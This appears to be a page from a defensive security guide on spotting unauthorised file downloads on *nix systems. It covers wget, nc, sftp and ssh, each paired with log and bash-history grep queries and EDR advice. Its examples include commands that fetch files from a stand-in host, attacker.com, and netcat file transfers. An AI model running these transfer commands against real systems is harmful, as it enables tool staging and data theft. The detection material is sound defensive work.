File Download

File Download in nix Systems: Tools and Detection

Attackers frequently use standard *nix utilities to download malicious tools or exfiltrate sensitive files. Below are common methods and detection strategies for identifying unauthorized file downloads.

Key Commands for File Download

1. wget Command

Purpose: Download files from web servers.

Example:

URL=http://attacker.com/file_to_get  
LFILE=file_to_save  
wget $URL -O $LFILE

Detection:

  • Focus on the -O parameter, which specifies the output file.

  • Verify if the destination (IP/domain) is trusted.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "wget" | grep "\-O"

  • Command History:

    history | grep "wget" | grep "\-O"
cat ~/.bash_history | grep "wget" | grep "\-O"

  • EDR/XDR Logs: Inspect wget processes and associated network traffic for unauthorized connections.

2. nc (Netcat) Command

Purpose: Transfer files using TCP or UDP.

Example:

On the remote system:

nc target.com 12345 < "file_to_send"

On the target system:

LPORT=12345  
LFILE=file_to_save  
nc -l -p $LPORT > "$LFILE"

Detection:

  • Look for -l (listen mode) and > operator to detect incoming file streams.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "nc" | grep "\-l"

  • Command History:

    history | grep "nc" | grep "\-l"
cat ~/.bash_history | grep "nc" | grep "\-l"

  • EDR/XDR Logs: Analyze nc processes and network activity for unauthorized file transfers.

3. sftp Command

Purpose: Secure file transfer over SSH.

Example:

RHOST=user@attacker.com  
sftp $RHOST  
get file_to_get file_to_save

Detection:

  • Focus on get operations for file downloads.

  • Verify the legitimacy of remote destinations.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "sftp"

  • Command History:

    history | grep "sftp"
cat ~/.bash_history | grep "sftp"

  • EDR/XDR Logs: Investigate sftp processes and network connections.

4. ssh Command

Purpose: Execute remote commands, including file transfers.

Example:

HOST=user@attacker.com  
RPATH=file_to_get  
LPATH=file_to_save  
ssh $HOST "cat $RPATH" > $LPATH

Detection:

  • Monitor the > operator in conjunction with remote file viewing commands like cat.

Detection Methods:

  • Audit Logs:

    cat /var/log/audit/audit.log | grep "ssh"

  • Command History:

    history | grep "ssh"
cat ~/.bash_history | grep "ssh"

  • EDR/XDR Logs: Examine ssh process events and parameters for unauthorized file retrievals.

General Detection Strategies

1. Monitor Known Tools

  • Regularly log and review commands like wget, nc, sftp, and ssh.

  • Pay close attention to connections with external or suspicious domains.

2. Check Network Traffic

  • Analyze outbound connections, especially to untrusted IPs or domains.

  • Use network monitoring tools to flag uncommon destinations or large data transfers.

3. Audit Logs

  • Regularly review /var/log/audit/audit.log for download-related commands.

4. Command History

  • Inspect history files for any download-related activities.

    history | grep [command]
cat ~/.bash_history | grep [command]

5. EDR/XDR Telemetry

  • Utilize endpoint detection tools to:

    • Correlate process events with network connections.

    • Detect and flag unauthorized file transfer patterns.

Key Points

While utilities like wget, nc, sftp, and ssh serve legitimate purposes, they are often exploited for malicious file downloads. Continuous monitoring, combined with thorough log analysis and EDR/XDR telemetry, is essential to identify and mitigate these threats effectively. By proactively implementing these strategies, defenders can strengthen their security posture against unauthorized file transfer activities.

PreviousFile UploadNextSudo

Last updated